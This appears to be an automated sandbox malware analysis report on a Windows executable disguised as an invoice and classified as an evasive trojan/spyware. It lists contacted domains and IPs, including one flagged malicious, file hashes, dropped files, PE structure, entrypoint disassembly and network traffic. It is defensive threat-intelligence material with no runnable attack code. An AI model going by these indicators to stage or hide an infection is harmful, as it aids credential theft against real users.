                              http://r3.o.lencr.org0CasPol.exe, 00000008.00000002.5692421448.000000000122A000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://topqualityfreeware.comn#U00ba410000512664.exefalse
                              • Avira URL Cloud: safe
                              unknown
                              http://mail.neopyme.comCasPol.exe, 00000008.00000002.5714326963.000000001DEF7000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://neopyme.comCasPol.exe, 00000008.00000002.5714326963.000000001DEF7000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://csp.withgoogle.com/csp/report-to/gse_l9ocaqCasPol.exe, 00000008.00000003.906849169.0000000001253000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              142.250.181.225
                              googlehosted.l.googleusercontent.comUnited States
                              15169GOOGLEUSfalse
                              54.36.109.179
                              neopyme.comFrance
                              16276OVHFRtrue
                              172.217.16.142
                              drive.google.comUnited States
                              15169GOOGLEUSfalse

                              General Information

                              Joe Sandbox Version:34.0.0 Boulder Opal
                              Analysis ID:526313
                              Start date:22.11.2021
                              Start time:14:19:27
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 14m 16s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:n#U00ba410000512664.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                              Run name:Suspected Instruction Hammering
                              Number of analysed new started processes analysed:36
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@4/6@4/3
                              EGA Information:Failed
                              HDC Information:Failed
                              HCA Information:
                              • Successful, ratio: 98%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe, MusNotificationUx.exe
                              • TCP Packets have been reduced to 100
                              • Excluded IPs from analysis (whitelisted): 20.54.122.82, 40.117.96.136, 209.197.3.8, 104.89.32.83
                              • Excluded domains from analysis (whitelisted): e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, arc.msn.com, login.live.com, continuum.dds.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, crl.root-x1.letsencrypt.org.edgekey.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, wu-shim.trafficmanager.net, settings-win.data.microsoft.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wdcp.microsoft.com, wd-prod-cp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, wdcpalt.microsoft.com, apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net, evoke-windowsservices-tas.msedge.net, apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net, nexusrules.officeapps.live.com, manage.devcenter.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              14:22:42Task SchedulerRun new task: Intel PTT EK Recertification path: "C:\Windows\System32\DriverStore\FileRepository\iclsclient.inf_amd64_75ffca5eec865b4b\lib\IntelPTTEKRecertification.exe"
                              14:23:23API Interceptor2747x Sleep call for process: CasPol.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              54.36.109.179justificante de la transfer.exeGet hashmaliciousBrowse
                                Ticari Hesap #U00d6zetiniz.exeGet hashmaliciousBrowse
                                  DdLvU2Gt7P.exeGet hashmaliciousBrowse
                                    justificante de la transfer.exeGet hashmaliciousBrowse
                                      factura n#U00ba0248325.exeGet hashmaliciousBrowse
                                        justificante de la transfer.exeGet hashmaliciousBrowse
                                          ejecutable.exeGet hashmaliciousBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            OVHFRjustificante de la transfer.exeGet hashmaliciousBrowse
                                            • 54.36.109.179
                                            1711.docGet hashmaliciousBrowse
                                            • 51.210.242.234
                                            #001245DOC.exeGet hashmaliciousBrowse
                                            • 51.83.52.225
                                            50% TT advance copy.docGet hashmaliciousBrowse
                                            • 213.251.158.218
                                            j1KoQBOY48Get hashmaliciousBrowse
                                            • 137.74.69.192
                                            cLFto0fGsbGet hashmaliciousBrowse
                                            • 51.255.137.219
                                            sVO9t8HDBT.exeGet hashmaliciousBrowse
                                            • 51.222.241.167
                                            arm7-20211121-1750Get hashmaliciousBrowse
                                            • 193.70.126.139
                                            1516i9qcBSGet hashmaliciousBrowse
                                            • 164.132.183.226
                                            kQONXU7aieGet hashmaliciousBrowse
                                            • 37.59.162.148
                                            sora.arm7Get hashmaliciousBrowse
                                            • 149.60.183.109
                                            3CZk5xMzFdGet hashmaliciousBrowse
                                            • 178.32.95.243
                                            mfFr814HupGet hashmaliciousBrowse
                                            • 178.32.95.234
                                            OJB73xstFmGet hashmaliciousBrowse
                                            • 217.182.97.113
                                            http___103.170.255.140_pdfword_invc_000930003999000.wbkGet hashmaliciousBrowse
                                            • 164.132.152.67
                                            PjvBTyWpg6.exeGet hashmaliciousBrowse
                                            • 91.121.181.6
                                            68886.xlsxGet hashmaliciousBrowse
                                            • 51.81.73.1
                                            GQwxmGZFvtg.dllGet hashmaliciousBrowse
                                            • 51.210.242.234
                                            7KLSwxaLAd.exeGet hashmaliciousBrowse
                                            • 51.68.142.233
                                            3eMNB.exeGet hashmaliciousBrowse
                                            • 51.83.52.225

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            37f463bf4616ecd445d4a1937da06e191Fu7t9XR6E.exeGet hashmaliciousBrowse
                                            • 142.250.181.225
                                            • 172.217.16.142
                                            justificante de la transfer.exeGet hashmaliciousBrowse
                                            • 142.250.181.225
                                            • 172.217.16.142
                                            justificante de la transfer.exeGet hashmaliciousBrowse
                                            • 142.250.181.225
                                            • 172.217.16.142
                                            7A0h5A8BmF.exeGet hashmaliciousBrowse
                                            • 142.250.181.225
                                            • 172.217.16.142
                                            AP_Remittance_SWT130003815_0.htmlGet hashmaliciousBrowse
                                            • 142.250.181.225
                                            • 172.217.16.142
                                            TEVRKPBK.EXEGet hashmaliciousBrowse
                                            • 142.250.181.225
                                            • 172.217.16.142
                                            ATTACHMENT 6637268#Hydro tech BG_pdf.exeGet hashmaliciousBrowse
                                            • 142.250.181.225
                                            • 172.217.16.142
                                            202111161629639000582.exeGet hashmaliciousBrowse
                                            • 142.250.181.225
                                            • 172.217.16.142
                                            6wV8uoO6lW.exeGet hashmaliciousBrowse
                                            • 142.250.181.225
                                            • 172.217.16.142
                                            L9s7zh4pKD.exeGet hashmaliciousBrowse
                                            • 142.250.181.225
                                            • 172.217.16.142
                                            qGwn1hxOmZ.exeGet hashmaliciousBrowse
                                            • 142.250.181.225
                                            • 172.217.16.142
                                            gIT7daOBPt.exeGet hashmaliciousBrowse
                                            • 142.250.181.225
                                            • 172.217.16.142
                                            f4gxrcTDkV.exeGet hashmaliciousBrowse
                                            • 142.250.181.225
                                            • 172.217.16.142
                                            SOO6hKZ7M0.exeGet hashmaliciousBrowse
                                            • 142.250.181.225
                                            • 172.217.16.142
                                            SOO6hKZ7M0.exeGet hashmaliciousBrowse
                                            • 142.250.181.225
                                            • 172.217.16.142
                                            f4gxrcTDkV.exeGet hashmaliciousBrowse
                                            • 142.250.181.225
                                            • 172.217.16.142
                                            BW5D0n506F.exeGet hashmaliciousBrowse
                                            • 142.250.181.225
                                            • 172.217.16.142
                                            cs.exeGet hashmaliciousBrowse
                                            • 142.250.181.225
                                            • 172.217.16.142
                                            0MGLPJiSa5.dllGet hashmaliciousBrowse
                                            • 142.250.181.225
                                            • 172.217.16.142
                                            Quote estimate.htmlGet hashmaliciousBrowse
                                            • 142.250.181.225
                                            • 172.217.16.142

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1391
                                            Entropy (8bit):7.705940075877404
                                            Encrypted:false
                                            SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                            MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                            SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                            SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                            SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview: 0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            File Type:Microsoft Cabinet archive data, 61414 bytes, 1 file
                                            Category:dropped
                                            Size (bytes):61414
                                            Entropy (8bit):7.995245868798237
                                            Encrypted:true
                                            SSDEEP:1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
                                            MD5:ACAEDA60C79C6BCAC925EEB3653F45E0
                                            SHA1:2AAAE490BCDACCC6172240FF1697753B37AC5578
                                            SHA-256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
                                            SHA-512:FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview: MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..*i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF.*...f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..*y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.*a..x..O..V.t..Y1!.T..`U...-...< _@...|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....
                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):192
                                            Entropy (8bit):2.742553200765873
                                            Encrypted:false
                                            SSDEEP:3:kkFkljszwHlltfllXlE/zMczz/ltNNX8RolJuRdyo1dlUKlGXJlDdt:kKHzwH/q1zzVNMa8Rdy+UKcXP
                                            MD5:FD24AC4F2EC4C58B3798A73A6842A167
                                            SHA1:66807319254AB0D11E480CD2B9A251396CD7EF97
                                            SHA-256:F2F27F7F2E80FBBC27139AA5F051083408CCA2E2DC28F20301FE2DBE6E3F75A8
                                            SHA-512:47F77E8DE8E45351D11E0070B415C8DCCDD07DC2A7B87DCD1B50AD325E99F3C5549C67104CECE5AA25DFC056173859A305E416855BAA64F341514B2A34014C69
                                            Malicious:false
                                            Reputation:low
                                            Preview: p...... ...........h....(....................................................... ..........~...8...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".5.a.6.2.8.1.5.c.-.5.6.f."...
                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):328
                                            Entropy (8bit):3.109960193012848
                                            Encrypted:false
                                            SSDEEP:6:kKJ/zk8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:x/z9kPlE99SNxAhUeYlUSA/t
                                            MD5:19437EE80EF28A945A04F1436ADA0DC3
                                            SHA1:3B021C61BEDF51D7438E642F77A583804C376A48
                                            SHA-256:0E607C2CB4327B0FB6A936521CCAE16825F314237D82C130B181D1970D4669F9
                                            SHA-512:7901AD60F2058707592D6F05E7C82785A8874F1F9A9B72AF9F49C0640ECCBBFD7B0794CC56A2D24C29F5AC57B47E3D431AD0D08704780DBE27EAF816B49A3939
                                            Malicious:false
                                            Reputation:low
                                            Preview: p...... ........B[Mh....(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...
                                            C:\Users\user\AppData\Local\Temp\~DF8D00AB13BF3C3E52.TMP
                                            Process:C:\Users\user\Desktop\n#U00ba410000512664.exe
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):32768
                                            Entropy (8bit):4.01191323271951
                                            Encrypted:false
                                            SSDEEP:384:wcZ0tADSVlx6JQhynrV7Vr9wrCIM/ZUYVPzBAPN:wcZeADSV/6qhynrV7VxwrrMvqPN
                                            MD5:6C4C01A4316CD9338DE51EC175EBF11D
                                            SHA1:8C5D5B07E0ED6AAC72705F516E25BEAEA891EFA0
                                            SHA-256:95876F7C1242672418DB201C02D70276EE9CC4345394DEAD3500619A39DA28F0
                                            SHA-512:9F60729E865B0414DB4792F76465EDCE1595D22E884D01C07389A312474D1CE916E4CF73275D5AA0CB411D8EBB0617EF661CD10467AD838FD1B0B388C44823D5
                                            Malicious:false
                                            Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            \Device\ConDrv
                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):30
                                            Entropy (8bit):3.964735178725505
                                            Encrypted:false
                                            SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                            MD5:9F754B47B351EF0FC32527B541420595
                                            SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                            SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                            SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                            Malicious:false
                                            Preview: NordVPN directory not found!..

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):4.926810109816392
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.15%
                                            • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:n#U00ba410000512664.exe
                                            File size:192512
                                            MD5:7c91db57c98a1f0e38ba65ed651b4779
                                            SHA1:28cb0d40a73c1a421a9720808d49da010f9ff4ef
                                            SHA256:12992fe3f998693d92625c53bf5aa6723e87c8c3fb7057dbba4b334742cab376
                                            SHA512:2ca3ac7de708b85262bd7e9d42b0cd78cd0af4f92c1da9c7be9d2e473bcc238a5935030eff688049d8c75fd3c3fd8fd80a5703eca4ab112e3a0997e74d6ac58a
                                            SSDEEP:3072:tdejCYyLGrRDAfor5hlNZI71PAMrc0yvhXeJ:tdeiGrRDAfA5XXMrcbeJ
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L.....&T.................0..........L........@....@........

                                            File Icon

                                            Icon Hash:0ceefedec6f67c0c

                                            Static PE Info

                                            General

                                            Entrypoint:0x40134c
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                            DLL Characteristics:
                                            Time Stamp:0x54260EAF [Sat Sep 27 01:11:11 2014 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f27a613fda76c14f4eab7dc0085d799e

                                            Entrypoint Preview

                                            Instruction
                                            push 00407F64h
                                            call 00007F02E454F1E3h
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            xor byte ptr [eax], al
                                            add byte ptr [eax], al
                                            inc eax
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [edi+6Eh], ch
                                            jl 00007F02E454F21Fh
                                            iretd
                                            je 00007F02E454F1D0h
                                            inc edi
                                            mov ebp, 13705FC0h
                                            ror byte ptr [eax+00000034h], 00000000h
                                            add byte ptr [eax], al
                                            add dword ptr [eax], eax
                                            add byte ptr [eax], al
                                            sub byte ptr [ebp-2B77FF20h], bh
                                            jne 00007F02E454F256h
                                            jo 00007F02E454F257h
                                            outsb
                                            jnc 00007F02E454F25Eh
                                            outsb
                                            add cl, bl
                                            add byte ptr [esi], al
                                            mov byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add bh, bh
                                            int3
                                            xor dword ptr [eax], eax
                                            add eax, 79A2685Bh
                                            out B9h, eax
                                            mov eax, dword ptr [A56F894Ah]
                                            sbb dword ptr [esi+33505045h], ebp
                                            in eax, ABh
                                            movsd
                                            pushfd
                                            push ds
                                            inc edi
                                            inc eax
                                            scasd
                                            push edi
                                            jc 00007F02E454F18Bh
                                            je 00007F02E454F20Ah
                                            push ebx
                                            jnle 00007F02E454F22Ch
                                            dec edi
                                            lodsd
                                            xor ebx, dword ptr [ecx-48EE309Ah]
                                            or al, 00h
                                            stosb
                                            add byte ptr [eax-2Dh], ah
                                            xchg eax, ebx
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            je 00007F02E454F25Bh
                                            add byte ptr [eax], al
                                            call far 0009h : 00000068h
                                            push ebp
                                            outsb
                                            jo 00007F02E454F267h
                                            jnc 00007F02E454F25Ah
                                            xor eax, dword ptr fs:[eax]
                                            or eax, 51000901h
                                            jne 00007F02E454F257h
                                            jc 00007F02E454F25Ch

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x235540x28.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x260000x90d5.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                                            IMAGE_DIRECTORY_ENTRY_IAT0x10000x100.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x229ac0x23000False0.354959542411data5.0849300681IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .data0x240000x13f00x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                            .rsrc0x260000x90d50xa000False0.346411132813data4.35437576998IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            CUSTOM0x2e8170x8beMS Windows icon resource - 1 icon, 32x32, 8 bits/pixelEnglishUnited States
                                            INSTALL0x2d39d0x8beMS Windows icon resource - 1 icon, 32x32EnglishUnited States
                                            INSTALL0x2ce9a0x503ISO-8859 text, with CRLF line terminatorsEnglishUnited States
                                            SETUP0x2e5190x2feMS Windows icon resource - 1 icon, 32x32, 16 colorsEnglishUnited States
                                            SETUP0x2dc5b0x8beMS Windows icon resource - 1 icon, 32x32EnglishUnited States
                                            RT_ICON0x2bff20xea8data
                                            RT_ICON0x2b74a0x8a8data
                                            RT_ICON0x2b0820x6c8data
                                            RT_ICON0x2ab1a0x568GLS_BINARY_LSB_FIRST
                                            RT_ICON0x285720x25a8dBase III DBT, version number 0, next free block index 40
                                            RT_ICON0x274ca0x10a8dBase III DBT, version number 0, next free block index 40
                                            RT_ICON0x26b420x988dBase III DBT, version number 0, next free block index 40
                                            RT_ICON0x266da0x468GLS_BINARY_LSB_FIRST
                                            RT_GROUP_ICON0x266640x76data
                                            RT_VERSION0x263a00x2c4dataTurkmenTurkmenistan

                                            Imports

                                            DLLImport
                                            MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, __vbaVarIdiv, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFPFix, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, __vbaVar2Vec, __vbaR8Str, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                            Version Infos

                                            DescriptionData
                                            Translation0x0442 0x04b0
                                            LegalCopyrightIdentiv
                                            InternalNameObumbration1
                                            FileVersion1.00
                                            CompanyNameIdentiv
                                            LegalTrademarksIdentiv
                                            ProductNameIdentiv
                                            ProductVersion1.00
                                            FileDescriptionIdentiv
                                            OriginalFilenameObumbration1.exe

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States
                                            TurkmenTurkmenistan

                                            Network Behavior

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 22, 2021 14:23:11.725856066 CET49764443192.168.11.20172.217.16.142
                                            Nov 22, 2021 14:23:11.725914955 CET44349764172.217.16.142192.168.11.20
                                            Nov 22, 2021 14:23:11.726064920 CET49764443192.168.11.20172.217.16.142
                                            Nov 22, 2021 14:23:11.749398947 CET49764443192.168.11.20172.217.16.142
                                            Nov 22, 2021 14:23:11.749408960 CET44349764172.217.16.142192.168.11.20
                                            Nov 22, 2021 14:23:11.787796974 CET44349764172.217.16.142192.168.11.20
                                            Nov 22, 2021 14:23:11.788125992 CET49764443192.168.11.20172.217.16.142
                                            Nov 22, 2021 14:23:11.788925886 CET44349764172.217.16.142192.168.11.20
                                            Nov 22, 2021 14:23:11.789170980 CET49764443192.168.11.20172.217.16.142
                                            Nov 22, 2021 14:23:11.941412926 CET49764443192.168.11.20172.217.16.142
                                            Nov 22, 2021 14:23:11.942190886 CET44349764172.217.16.142192.168.11.20
                                            Nov 22, 2021 14:23:11.942478895 CET49764443192.168.11.20172.217.16.142
                                            Nov 22, 2021 14:23:11.953404903 CET49764443192.168.11.20172.217.16.142
                                            Nov 22, 2021 14:23:11.995889902 CET44349764172.217.16.142192.168.11.20
                                            Nov 22, 2021 14:23:12.505215883 CET44349764172.217.16.142192.168.11.20
                                            Nov 22, 2021 14:23:12.505440950 CET49764443192.168.11.20172.217.16.142
                                            Nov 22, 2021 14:23:12.505495071 CET44349764172.217.16.142192.168.11.20
                                            Nov 22, 2021 14:23:12.505671978 CET44349764172.217.16.142192.168.11.20
                                            Nov 22, 2021 14:23:12.505702972 CET49764443192.168.11.20172.217.16.142
                                            Nov 22, 2021 14:23:12.505827904 CET49764443192.168.11.20172.217.16.142
                                            Nov 22, 2021 14:23:12.562113047 CET49764443192.168.11.20172.217.16.142
                                            Nov 22, 2021 14:23:12.562166929 CET44349764172.217.16.142192.168.11.20
                                            Nov 22, 2021 14:23:12.656863928 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.656950951 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.657108068 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.657438993 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.657493114 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.690506935 CET44349765142.250.181.225192.168.11.20
                                            Nov 22, 2021 14:23:12.690809965 CET49765443192.168.11.20142.250.181.225
                                            Nov 22, 2021 14:23:12.691174030 CET44349765142.250.181.225192.168.11.20
